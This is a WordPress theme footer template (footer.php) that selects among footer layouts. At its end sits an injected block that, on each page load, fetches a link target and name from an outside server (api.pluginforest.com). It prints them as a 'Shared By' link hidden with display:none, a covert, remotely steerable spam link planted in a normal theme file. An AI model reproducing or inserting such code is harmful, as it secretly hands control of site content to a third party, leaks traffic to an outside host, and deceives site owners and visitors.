<?php if ( ! defined( 'ABSPATH' ) ) :
    exit; // Exit if accessed directly
endif; ?>

    <?php $tt_footer_style = markety_option('footer-style', false, 'footer-default');

	    $page_footer = "";
        if (function_exists('rwmb_meta')) : 
            $page_footer = rwmb_meta('markety_footer_style');
        endif;

        if ($page_footer == 'inherit-theme-option' || empty($page_footer)) :
            if ($tt_footer_style == 'footer-three-column') :
  		        get_footer('three-column');
  		    elseif ($tt_footer_style == 'footer-four-column') :
  		        get_footer('four-column');
  		    elseif ($tt_footer_style == 'footer-onepage') :
  		        get_footer('onepage');
  		    else :
  		        get_footer('default');
  		    endif;
        elseif($page_footer == 'footer-three-column') :
            get_footer('three-column');
       	elseif($page_footer == 'footer-four-column') :
       		get_footer('four-column');
       	elseif($page_footer == 'footer-onepage') :
       		get_footer('onepage');
       	else :
       		get_footer('default');
        endif; ?>

<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>